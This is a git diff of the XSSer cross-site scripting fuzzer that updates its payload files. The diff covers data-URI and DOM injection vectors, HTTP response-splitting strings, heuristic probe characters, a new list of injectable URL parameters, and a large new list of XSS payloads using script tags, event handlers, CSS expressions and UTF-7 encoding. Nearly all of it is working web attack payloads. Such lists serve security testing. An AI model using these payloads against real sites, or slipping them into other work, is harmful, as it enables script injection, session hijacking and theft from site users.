+		{ 'payload' : """<EMBED SRC="data:image/svg+xml;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]" type="image/svg+xml" AllowScriptAccess="always"></EMBED>""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<embed src="data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]"></embed>""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<iframe/src="data:text/html;&Tab;base64&Tab;,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<object data="data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]"></object>""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<object data=data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]></object>​""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """data:image/svg+xml;base64,[B64]<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="Y"><script type="text/ecmascript">alert("PAYLOAD");</script></svg>[B64]""",
+          'browser' : """[Data Control Protocol Injection]""" }
+		]
diff --git a/xsser/core/fuzzing/DOM.py b/core/fuzzing/DOM.py
similarity index 86%
rename from xsser/core/fuzzing/DOM.py
rename to core/fuzzing/DOM.py
index 580d257..3f610ee 100644
--- a/xsser/core/fuzzing/DOM.py
+++ b/core/fuzzing/DOM.py
@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -26,19 +24,14 @@
 ## Happy Cross Hacking! ;)
 
 DOMvectors = [
-		{ 'payload' : """?notname=PAYLOAD""",
-		  'browser' : """[Document Object Model Injection]"""},
-		  
 		{ 'payload' : """?notname=PAYLOAD&""",
 		  'browser' : """[Document Object Model Injection]"""},
-
 		{ 'payload':'''<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="PAYLOAD" style="behavior:url(#x);"><param name=postdomevents /></object>''',
 		  'browser' : """[Document Object Model Injection]"""},
-
 		{ 'payload' : """?<script>history.pushState(0,0,'PAYLOAD');</script>""",
 		  'browser' : """[Document Object Model Injection]"""},
-		  
+		{ 'payload' : """?name=Y%0d%0a%0d%0aPAYLOAD""",
+		  'browser' : """[Document Object Model Injection]"""}, 
 		{ 'payload' : """?foobar=name=PAYLOAD&""",
 		  'browser' : """[Document Object Model Injection]"""}
 		]
-
diff --git a/xsser/core/fuzzing/HTTPsr.py b/core/fuzzing/HTTPsr.py
similarity index 53%
rename from xsser/core/fuzzing/HTTPsr.py
rename to core/fuzzing/HTTPsr.py
index b67e1b2..5f38c14 100644
--- a/xsser/core/fuzzing/HTTPsr.py
+++ b/core/fuzzing/HTTPsr.py
@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -26,41 +24,26 @@
 ## Happy Cross Hacking! ;)
 
 HTTPrs_vectors = [
-		{ 'payload' : """%0d%0AContent-Length:%200%0d%0A%0d%0AHTTP/1.1%20200%20OK%0d%0AContent-Length:%2016%0d%0A%0d%0A&lt;html&gt;XSS&lt;/html&gt;
-			""",
-                  'browser' : """[Induced Injection]""" },
-
-		{ 'payload' : """XSS%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2029%0d%0a%0d%0a<script>alert("XSS")</script>""",
-                  'browser' : """[Induced Injection]""" },
-
-		{ 'payload' : """%0D%0ASet-Cookie%3AXSS""",
-                  'browser' : """[Induced Injection]""" },
-
-		{ 'payload' : """%0AContent-Type:html%0A%0A%3Cbody%20onload=alert(%22XSS%22)%3E""",
-                  'browser' : """[Induced Injection]""" },
-
-		{ 'payload' : """%0AContent-Type:text/html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com""",
-                  'browser' : """[Induced Injection]""" },
-
-		{ 'payload' : """%0AContent-type:%20html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E""",
-                  'browser' : """[Induced Injection]""" },
-
-		{ 'payload' : """%0AExpect:%20%3Cscript%3Ealert(%22XSS%22)%3C/script%3E""",
-                  'browser' : """[Induced Injection]""" },
-
-		{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified: Wed, 13 Jan 2006 12:44:23 GMT%0d%0aContent-Type:text/html%0d%0a%0d%0a<html>XSS</html>%20HTTP/1.1""",
+		{ 'payload' : """%0d%0AContent-Length:%200%0d%0A%0d%0AHTTP/1.1%20200%20OK%0d%0AContent-Length:%2016%0d%0A%0d%0A&lt;html&gt;PAYLOAD&lt;/html&gt;""",
+          'browser' : """[Induced Injection]""" },
+		{ 'payload' : """PAYLOAD%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2029%0d%0a%0d%0a<script>alert("PAYLOAD")</script>""",
+          'browser' : """[Induced Injection]""" },
+		{ 'payload' : """%0D%0ASet-Cookie%3APAYLOAD""",
+          'browser' : """[Induced Injection]""" },
+		{ 'payload' : """%0AContent-Type:html%0A%0A%3Cbody%20onload=alert(%22PAYLOAD%22)%3E""",
+          'browser' : """[Induced Injection]""" },
+		{ 'payload' : """%0AContent-Type:text/html%0A%0A%3Cscript%3Ealert(%22PAYLOAD%22)%3C/script%3Ehttp://www.test.com""",
+          'browser' : """[Induced Injection]""" },
+		{ 'payload' : """%0AContent-type:%20html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22PAYLOAD%22)%3C/script%3E""",
+          'browser' : """[Induced Injection]""" },
+		{ 'payload' : """%0AExpect:%20%3Cscript%3Ealert(%22PAYLOAD%22)%3C/script%3E""",
+          'browser' : """[Induced Injection]""" },
+		{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified: Wed, 13 Jan 2006 12:44:23 GMT%0d%0aContent-Type:text/html%0d%0a%0d%0a<html>PAYLOAD</html>%20HTTP/1.1""",
 		  'browser' : """[Induced Injection]"""},
-				
-		{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aCache-Control: no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>XSS</html>%20HTTP/1.1
-			""",
-                  'browser' : """[Induced Injection]"""},
-
-		{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aPragma:no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>XSS</html>%20HTTP/1.1
-			""",
+		{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aCache-Control: no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>PAYLOAD</html>%20HTTP/1.1""",
+          'browser' : """[Induced Injection]"""},
+		{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aPragma:no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>PAYLOAD</html>%20HTTP/1.1""",
 		  'browser' : """[Induced Injection]""" },
-
-		{ 'payload' : """%0d%0AContent-Type: text/html;charset=UTF-7%0A%0A%2BADw-script%2BAD4-alert('%58%53%53');%2BADw-/script%2BAD4-
-			""",
-                  'browser' : """[Induced Injection]""" }
+		{ 'payload' : """%0d%0AContent-Type: text/html;charset=UTF-7%0A%0A%2BADw-script%2BAD4-alert('PAYLOAD');%2BADw-/script%2BAD4-""",
+          'browser' : """[Induced Injection]""" }
 		]
-
diff --git a/xsser/core/fuzzing/__init__.py b/core/fuzzing/__init__.py
similarity index 84%
rename from xsser/core/fuzzing/__init__.py
rename to core/fuzzing/__init__.py
index 192a90c..22a1b8e 100644
--- a/xsser/core/fuzzing/__init__.py
+++ b/core/fuzzing/__init__.py
@@ -1,9 +1,7 @@
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
diff --git a/core/fuzzing/dorks.txt b/core/fuzzing/dorks.txt
new file mode 100644
index 0000000..5b336a2
--- /dev/null
+++ b/core/fuzzing/dorks.txt
@@ -0,0 +1,40 @@
+?id=
+?url=
+?search=
+?query=
+?cmd=
+?z=
+?q=
+?l=
+?r=
+?searchstring=
+?keyword=­
+?file=
+?years=
+?txt=
+?tag=
+?max=
+?from=
+?author=
+?pass=
+?feedback­=
+?mail=
+?cat=
+?vote=
+?sid=
+?msg=
+?category=
+?PID= 
+?search_keywords=
+?mid=
+?catid=
+?pid=
+?order_direction=
+?course_id=
+?session=
+?sfunction=
+?search_keywords=
+?site=
+?errmsg=
+?decl_id=
+?num=
diff --git a/xsser/core/fuzzing/heuristic.py b/core/fuzzing/heuristic.py
similarity index 73%
rename from xsser/core/fuzzing/heuristic.py
rename to core/fuzzing/heuristic.py
index b7b4ce5..596f60b 100644
--- a/xsser/core/fuzzing/heuristic.py
+++ b/core/fuzzing/heuristic.py
@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -26,79 +24,50 @@
 ## Happy Cross Hacking! ;)
 
 heuristic_test = [
-		# ascii
 		{ 'payload' : """XSS\\XSS""",
-                  'browser' : """[Heuristic test]""" },
-
+          'browser' : """[Heuristic test]""" },
 		{ 'payload' : """XSS/XSS""",
-		  'browser' : """[Heuristic test]""" },
-				
+		  'browser' : """[Heuristic test]""" },			
 		{ 'payload' : """XSS>XSS""",
-                  'browser' : """[Heuristic test]""" },
-
+          'browser' : """[Heuristic test]""" },
 		{ 'payload' : """XSS<XSS""",
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : """XSS;XSS""",
-                  'browser' : """[Heuristic test]""" },
-
+          'browser' : """[Heuristic test]""" },
 		{ 'payload' : """XSS'XSS""",
-                  'browser' : """[Heuristic test]""" },
-
+          'browser' : """[Heuristic test]""" },
 		{ 'payload' : '''XSS"XSS''',
-                  'browser' : """[Heuristic test]""" },
-
+          'browser' : """[Heuristic test]""" },
 		{ 'payload' : """XSS=XSS""",
-                  'browser' : """[Heuristic test]""" },
-                # hex/une
+          'browser' : """[Heuristic test]""" },
 		{ 'payload' : """XSS%5CXSS""",
 		  'browser' : """[Heuristic test]""" },
-                # / is the same on Unicode than in ASCII
-                #{ 'payload' : """XSS/XSS""",
-                #  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : """XSS%3EXSS""",
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : """XSS%3CXSS""",
 		  'browser' : """[Heuristic test]""" },
-		
 		{ 'payload' : """XSS%3BXSS""",
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : """XSS%27XSS""",
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : '''XSS%22XSS''',
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : """XSS%3DXSS""",
 		  'browser' : """[Heuristic test]""" },
-                # dec
 		{ 'payload' : """XSS&#92XSS""",
 		  'browser' : """[Heuristic test]""" },
-		
 		{ 'payload' : """XSS&#47XSS""",
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : """XSS&#62XSS""",
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : """XSS&#60XSS""",
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : """XSS&#59XSS""",
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : """XSS&#39XSS""",
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : '''XSS&#34XSS''',
-                  'browser' : """[Heuristic test]""" },
-
+          'browser' : """[Heuristic test]""" },
 		{ 'payload' : """XSS&#61XSS""",
 		  'browser' : """[Heuristic test]""" }
-
 		]
-
-
diff --git a/xsser/core/fuzzing/user-agents.txt b/core/fuzzing/user-agents.txt
similarity index 100%
rename from xsser/core/fuzzing/user-agents.txt
rename to core/fuzzing/user-agents.txt
diff --git a/core/fuzzing/vectors.py b/core/fuzzing/vectors.py
new file mode 100644
index 0000000..03c9a65
--- /dev/null
+++ b/core/fuzzing/vectors.py
@@ -0,0 +1,2612 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+This file is part of the XSSer project, https://xsser.03c8.net
+
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+## This file contains different XSS fuzzing vectors.
+## If you have some new, please email me to [epsylon@riseup.net]
+## Happy Cross Hacking! ;)
+
+vectors = [	{ 'payload':'''">PAYLOAD''',
+		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
+        { 'payload':""""><SCRIPT>alert('PAYLOAD')</SCRIPT>""",
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},	
+        { 'payload':"""</TITLE>PAYLOAD""",
+	      'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
+		{ 'payload':""""><img src="x:x" onerror="PAYLOAD">""",
+		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},		
+		{ 'payload':"""<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=PAYLOAD>""",
+		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
+		{ 'payload':"""'';!--"<PAYLOAD>=&{()}" """,
+		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},	
+		{ 'payload':"""<IMG SRC="PAYLOAD">""",
+		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
+		{ 'payload':"""<IMG SRC=PAYLOAD>""",
+  		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
+		{ 'payload':"""<IMG SRC=`PAYLOAD`>""",
+		  'browser':"""[IE6.0|NS8.1-IE]"""},
+		{ 'payload':"""<IMG '''>PAYLOAD'>""",
+		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
+		{ 'payload':"""<IMG SRC=" &#14;  PAYLOAD">""",
+	      'browser':"""[IE6.0|NS8.1-IE]"""},
+		{ 'payload':"""<DIV STYLE="behaviour: url(PAYLOAD);">""",
+		  'browser':"""[IE6.0|NS8.1-IE]"""},
+        { 'payload':"""<<SCRIPT>PAYLOAD//<</SCRIPT>""",
+		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
+		{ 'payload':"""\";PAYLOAD//""",
+		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
+		{ 'payload':"""<IMG SRC='PAYLOAD'""",
+		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
+		{ 'payload':"""<BODY BACKGROUND="PAYLOAD">""",
+		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
+		{ 'payload':"""<INPUT TYPE="IMAGE" SRC="PAYLOAD">""",
+		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
+        { 'payload':"""<BODY ONLOAD=PAYLOAD>""",
+	      'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
+		{ 'payload':"""<IMG DYNSRC="PAYLOAD">""",
+		  'browser':"""[IE6.0|NS8.1-IE]"""},
+		{ 'payload':"""<IMG LOWSRC="PAYLOAD">""",
+		  'browser':"""[IE6.0|NS8.1-IE]"""},
+		{ 'payload':"""<BGSOUND SRC="PAYLOAD">""",
+	      'browser':"""[O9.02]"""},
+        { 'payload':"""<BR SIZE="&{PAYLOAD}">""",
+		  'browser':"""[NS4]"""},
+		{ 'payload':"""<LINK REL="stylesheet" HREF="PAYLOAD">""",
+		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
+		{ 'payload':"""<IMG SRC='vbscript:PAYLOAD'>""",
+	   	  'browser':"""[IE6.0|NS8.1-IE]"""},
+		{ 'payload':"""<IMG SRC="mocha:[PAYLOAD]">""",
+	   	  'browser':"""[NS4]"""},
+	 	{ 'payload':"""<IMG SRC="livescript:[PAYLOAD]">""",
+	  	  'browser':"""[NS4]"""},
+	 	{ 'payload':"""<META HTTP-EQUIV="refresh" CONTENT="0;url=PAYLOAD">""",
+	   	  'browser':"""[IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
+	 	{ 'payload':"""<TABLE BACKGROUND="PAYLOAD">""",
+	      'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
+        { 'payload':"""<TABLE BACKGROUND=javascript:PAYLOAD>""",
+          'browser':"""[O9.02]"""},
+		{ 'payload':"""<TABLE><TD BACKGROUND="PAYLOAD">""",
+		  'browser':"""[IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
+		{ 'payload':"""<DIV STYLE="background-image: url(PAYLOAD);">""",
+		  'browser':"""[IE6.0|NS8.1-IE]"""},			  
+		{ 'payload':"""<DIV STYLE="width: expression(PAYLOAD);">""",
+		  'browser':"""[IE7.0|IE6.0|NS8.1-IE]"""},
+		{ 'payload':"""<IFRAME SRC="PAYLOAD"></IFRAME>""",
+		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
+        { 'payload':"""<iframe/ /onload=PAYLOAD></iframe>""",
+          'browser':"""Not Info"""},
+        { 'payload':"""<iframe/ "onload=PAYLOAD></iframe>""",
+          'browser':"""Not Info"""},
+        { 'payload':"""<iframe///////onload=PAYLOAD></iframe>""",
+          'browser':"""Not Info"""},
+        { 'payload':"""<iframe "onload=PAYLOAD></iframe>""",
+          'browser':"""Not Info"""},
+        { 'payload':"""<iframe<?php echo chr(11)?> onload=PAYLOAD></iframe>""",
+          'browser':"""Not Info"""},
+        { 'payload':"""<iframe<?php echo chr(12)?> onload=PAYLOAD></iframe>""",
+          'browser':"""Not Info"""},
+   		{ 'payload':"""<FRAMESET><FRAME SRC="PAYLOAD"></FRAMESET>""",
+		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
+		{ 'payload':"""<TABLE BACKGROUND="PAYLOAD">""",
+		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
+		{ 'payload':"""<TABLE><TD BACKGROUND="PAYLOAD">""",
+  		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""}, 			  
+		{ 'payload':"""<DIV STYLE="background-image: url(&#1;PAYLOAD)">""",
+		  'browser':"""[IE6.0|NS8.1-IE]"""},
+   		{ 'payload':"""<DIV STYLE="width: expression(PAYLOAD);">""",
+		  'browser':"""[IE7.0|IE6.0|NS8.1-IE]"""},
+		{ 'payload':"""<IMG STYLE="X:expr/*X*/ession(PAYLOAD)">""",
+  		  'browser':"""[IE7.0|IE6.0|NS8.1-IE]"""}, 
+		{ 'payload':"""<X STYLE="X:expression(PAYLOAD)">""",
+		  'browser':"""[IE7.0|IE6.0|NS8.1-IE]"""},			  
+   		{ 'payload':"""<STYLE TYPE="text/javascript">PAYLOAD</STYLE>""",
+		  'browser':"""[NS4]"""},
+		{ 'payload':"""<STYLE>.X{background-image:url("PAYLOAD");}</STYLE><A CLASS=X></A>""",
+		  'browser':"""[IE6.0|NS8.1-IE]"""},
+		{ 'payload':"""<STYLE type="text/css">BODY{background:url("PAYLOAD")}</STYLE>""",
+  		  'browser':"""[IE6.0|NS8.1-IE]"""}, 		  
+		{ 'payload':"""<!--[if gte IE 4]>PAYLOAD<![endif]-->""",
+		  'browser':"""[IE7.0|IE6.0|NS8.1-IE]"""},
+   		{ 'payload':"""<BASE HREF="PAYLOAD//">""",
+		  'browser':"""[IE6.0|NS8.1-IE]"""},
+		{ 'payload':"""<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=PAYLOAD></OBJECT>""",
+		  'browser':"""[O9.02]"""},
+		{ 'payload':"""a="get";b="URL(\"";c="javascript:";d="PAYLOAD\")";eval(a+b+c+d);""",
+  		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""}, 		  
+		{ 'payload':"""<? echo('<SCR)';echo('IPT>PAYLOAD</SCRIPT>'); ?>""",
+  		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""}, 		  
+		{ 'payload':"""<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;PAYLOAD&lt;/SCRIPT&gt;">""",
+		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},	 
+		{ 'payload':"""<SCRIPT SRC=http://127.0.0.1>PAYLOAD</SCRIPT>""", 
+		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
+		{ 'payload':"""<IMG SRC="&14;javascript:PAYLOAD">""",
+		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
+        { 'payload':"""<IMG SRC="jav&#x0D;ascript:PAYLOAD">""",
+          'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
+        { 'payload':"""--- <IMG SRC=" &#14;  PAYLOAD">""",
+          'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
+        { 'payload':'''--- <IMG SRC="PAYLOAD"''',
+          'browser':"""[IE6.0|NS8.1-IE] [09.02]"""},
+        { 'payload':"""<SCRIPT>a=/PAYLOAD/alert(a.source)</SCRIPT>""",
+          'browser':"""[Not Info]"""},
+        { 'payload':'''--- \";PAYLOAD;//''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<META HTTP-EQUIVo"refresh" CONTENT="0; URL=http://;URL=PAYLOAD">''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
+		{ 'payload':"""<SCRIPT <B>=PAYLOAD"></SCRIPT>""",
+		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},	 
+		{ 'payload':"""<IFRAME SRC="javascript:PAYLOAD <""",
+		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
+		{ 'payload':"""<SCRIPT>a=/X/nPAYLOAD</SCRIPT>""",
+		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
+		{ 'payload':"""<LAYER SRC="javascript:PAYLOAD></LAYER>""",
+		  'browser':"""[NS4]"""},
+		{ 'payload':"""<STYLE>li {list-style-image: url("PAYLOAD</STYLE><UL><LI>X""", 
+		  'browser':"""[IE6.0|NS8.1-IE]"""},
+		{ 'payload':"""<DIV STYLE="background-image: url(&#1;javascript:PAYLOAD">""",
+		  'browser':"""[IE6.0|NS8.1-IE]"""},
+		{ 'payload':"""<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"></HEAD>+ADw-SCRIPT+AD4-PAYLOAD+ADw-/SCRIPT+AD4-""",
+		  'browser':"""[IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
+		{ 'payload':"""<a href="javascript#PAYLOAD">""",
+		  'browser':"""[IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
+		{ 'payload':"""<input type="image" dynsrc="PAYLOAD">""",
+		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
+		{ 'payload':"""&PAYLOAD">""",
+		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
+		{ 'payload':"""&{PAYLOAD};""",
+		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
+		{ 'payload':"""<IMG SRC=&{PAYLOAD};>""",
+		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
+		{ 'payload':"""<a href="about:PAYLOAD">""",
+		  'browser':"""[IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
+		{ 'payload':"""<DIV STYLE="binding: url(javascript:PAYLOAD);">""",
+		  'browser':"""[IE6.0|NS8.1-IE]"""},
+		{ 'payload':"""<OBJECT classid=clsid:..." codebase="javascript:PAYLOAD">""",
+		  'browser':"""[O9.02]"""},
+		{ 'payload':"""<style><!--</style><SCRIPT>PAYLOAD//--></SCRIPT>""",
+		  'browser':"""[IE6.0|NS8.1-IE]"""},
+		{ 'payload':"""![CDATA[<!--]]<SCRIPT>PAYLOAD//--></SCRIPT>""",
+		  'browser':"""[IE6.0|NS8.1-IE]"""},
+		{ 'payload':"""<!-- -- -->PAYLOAD<!-- -- -->""",
+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<xml id="X"><a><b>PAYLOAD;<b></a></xml>''',
+		  'browser':"""[IE6.0|NS8.1-IE]"""},
+		{ 'payload':'''<div datafld="b" dataformatas="html" datasrc="#PAYLOAD"></div>''',
+		  'browser':"""[IE]"""},
+		{ 'payload':'''<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:PAYLOAD">]]</C><X></xml>''',
+		  'browser':"""[IE6.0|NS8.1-IE]"""},
+        { 'payload':"""<script psy>/*<script* */alert(PAYLOAD)</script""",
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+ 		{ 'payload':'''<img src=1 href=1 onerror="PAYLOAD"></img>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+    	{ 'payload':'''<audio src=1 href=1 onerror="PAYLOAD"></audio>''',
+          'browser':"""[HTML5 Injection]"""},
+ 		{ 'payload':'''<video src=1 href=1 onerror="PAYLOAD"></video>''',
+          'browser':"""[HTML5 Injection]"""},
+ 		{ 'payload':'''<body src=1 href=1 onerror="PAYLOAD"></body>''',
+          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
+ 		{ 'payload':'''<image src=1 href=1 onerror="PAYLOAD"></image>''',
